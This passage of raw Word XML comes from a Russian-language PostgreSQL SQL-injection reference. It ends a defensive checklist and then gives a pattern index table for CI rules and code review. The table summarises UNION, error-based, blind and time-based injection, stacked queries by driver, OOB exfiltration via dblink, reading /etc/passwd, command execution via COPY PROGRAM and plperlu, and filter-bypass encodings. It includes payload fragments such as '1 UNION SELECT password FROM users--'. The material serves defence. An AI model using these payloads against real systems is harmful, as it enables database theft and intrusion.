        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не доверять server defaults без аудита</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 5.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не предполагать, что injection не произошла — мониторить</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 5.6.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не считать пункты 1–6 одноразовыми — аудитить регулярно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это раздел 5 целиком.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Таблица всех паттернов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводный index по всем 3.X.N. Используется для поиска паттерна по ID, для cross-reference из CI / rules.py / документации команды, для quick-lookup при PR review. Содержательно дублирует «Суть» из каждой 3.X.N карточки в одну строку.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Колонки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ID</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3.X.N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> номер подраздела.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Категория</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — короткое название класса атак.</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Краткая суть</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — одна строка о механике паттерна.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Версии PG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — где работает (диапазон); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">все</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> означает все поддерживаемые ветки.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Severity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для CVE-anchored: CVSS; для feature/pattern: «high» / «medium» / «low» по impact assessment.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Якорь</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R# для research-якорей либо «—» для derived patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 UNION-based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UNION-based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Класс UNION-инъекций в integer и text контексте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(читает чужие колонки)</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UNION column count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Подбор количества колонок через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">UNION SELECT NULL,NULL,…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UNION через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">::text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Принудительный cast чужих колонок в text для slot-matching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UNION в IN-listе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1 UNION SELECT password FROM users--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в IN-listе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UNION + pg_class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Извлечение column metadata через UNION с </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_class</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pg_namespace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3.2 Error-based injection через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Error-based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Класс error-based extraction через type-cast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R19</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CAST в SELECT subquery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CAST((SELECT ...) AS int)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → leak в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">invalid input syntax</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R19</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::regclass</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> leak</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Произвольная строка в текст ошибки </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">relation "..." does not exist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R19</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Boolean errors через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CASE WHEN ... THEN 1/0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HTTP 500 vs 200 как boolean-канал</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R19</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XML errors через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">::xml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Leak через XML-parser error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R19</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3.2.5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Framework error leak (Django / SQLAlchemy / Spring)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DEBUG=True</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → full SQL + error в HTTP response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R19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Boolean-based blind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3.3.0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Boolean blind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Канал через difference HTTP 200 (content)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 (slow)</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3.3.1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CASE WHEN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> как boolean primitive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AND (CASE WHEN cond THEN TRUE ELSE FALSE END)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3.3.2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Bit-by-bit через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">substring</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ascii</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Извлечение посимвольно с serial-comparison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 (~7N запросов)</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3.3.3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Row-count через tautology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Row-count difference как boolean signal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3.4 Time-based blind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Time-based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Канал через measurable wall-time difference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pg_sleep</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CASE WHEN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Прямая задержка от boolean expression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Multiplication через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">generate_series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Усиление signal через большие row-counts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Recursive CTE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CTE как амплификатор time-difference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3.4.4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generate_series + heavy expression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Cost-based delay без </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_sleep</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-сигнатуры</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3.5 Stacked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Stacked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Класс multi-statement инъекций через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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(зависит от драйвера)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(DDL / DML smuggle)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psycopg2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Всегда simple protocol; защита client-side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psycopg3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Extended при params, simple без params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asyncpg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Extended при args, без mogrify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pgjdbc</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PreparedStatement → extended; Statement → simple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pgx (Go)</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Default extended, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">simple_protocol</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> mode разрешает stacking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node-postgres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query(sql, values)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → extended; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">query(sql)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → simple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Driver matrix таблица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Сводка по 6 драйверам × режимам</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reference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r>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6 OOB / SSRF / file-read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dblink_connect TCP / DNS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OOB exfiltration через user/dbname → DNS hex chunks или TCP listener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9.x – 17, требует extension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(exfil)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postgres_fdw SSRF / DNS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Foreign Server к произвольному host:port → DNS-эксфильтрация или TCP-сканирование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 17, требует extension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(SSRF + exfil)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pg_read_file / pg_read_server_files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File-read из SQL: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/passwd</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postgresql.conf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_hba.conf</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 17, привилегия </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_read_server_files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(file leak)</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R4</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3.6.4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lo_import / lo_export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OID-based file-read + единственный file-write вектор в 3.6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 – 17, привилегия </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_read_server_files</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pg_write_server_files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(file r/w)</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R4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7 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Три модели угроз: COPY PROGRAM, plperlu, plpython3u</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R3, R7</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COPY FROM / TO PROGRAM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как OS-пользователь postgres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9.3 – 17, привилегия </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_execute_server_program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R3 (disputed)</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3.7.2a</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plperlu untrusted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Полный Perl без sandbox, RCE через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">system()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / любой Perl built-in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требует extension + SUPERUSER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plperl trusted + CVE-2024-10979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$ENV{} hijack из trusted PL/Perl → PATH / LD_PRELOAD RCE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17.0, 16.4, 15.8, 14.13, 13.16, 12.20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R7</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plpython3u и plsh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Python без sandbox + shell-functions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требует extension + SUPERUSER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3.8 Извлечение метаданных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Metadata extraction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Доступ к pg_catalog для reconnaissance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pg_class / pg_namespace / pg_attribute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Карта схем, таблиц, колонок</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pg_proc</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Функции, сигнатуры, исходники (включая SD-функции)</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pg_authid / pg_shadow</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Хеши паролей; SUPERUSER-only по умолчанию</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(если доступ)</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Fingerprinting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version()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, GUC, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_extension</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> для targeted exploit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low (info)</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query_to_xml / database_to_xml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Массовый дамп БД одним вызовом</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 (mass exfil)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pg_stats / pg_stats_ext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Утечка через optimizer statistics (CVE-2024-4317, CVE-2025-8713)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до 14.11/15.6/16.2 (R17); до 17.5/16.9/15.13/14.18/13.21 (R26)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R17, R26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9 Обход фильтров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Filter bypass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Класс bypass-приёмов WAF-ов и validation-regex</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Dollar-quoted strings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$$payload$$</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$tag$payload$tag$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> обходит фильтрацию </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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(с PG 8.0)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R5</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chr()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + конкатенация</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`chr(39) \</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'OR'` обходит фильтр одинарных кавычек</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Unicode escape </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">U&amp;'\0027'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Hex-encoded character literal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Escape strings </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">E'\x27'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C-style byte literals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convert_from(decode(...))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Hex / base64-encoded строки</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Регистр keywords / whitespace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SeLeCt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, tab/newline tricks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 pointer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Invalid UTF-8 в psql-обёртке → SQLi → COPY TO PROGRAM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17.2, 16.6, 15.10, 14.15, 13.18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8.1 (High)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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.10 CTE-based / side-effects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CTE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Класс smuggle write-ops через read-only endpoint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R22</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Data-modifying CTE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WITH x AS (INSERT/UPDATE/DELETE … RETURNING) SELECT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 (с 9.1)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R22</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CTE как амплификатор time-based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Усиление delay через repeated CTE-execution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3.10.3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Leaky views + CTE materialization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View ACL bypass через CTE-materialization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3.11 Type-casting tricks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Type-casting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Использование implicit / explicit cast для injection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Boolean coercion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Cast non-boolean к boolean через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WHERE x</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jsonb </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
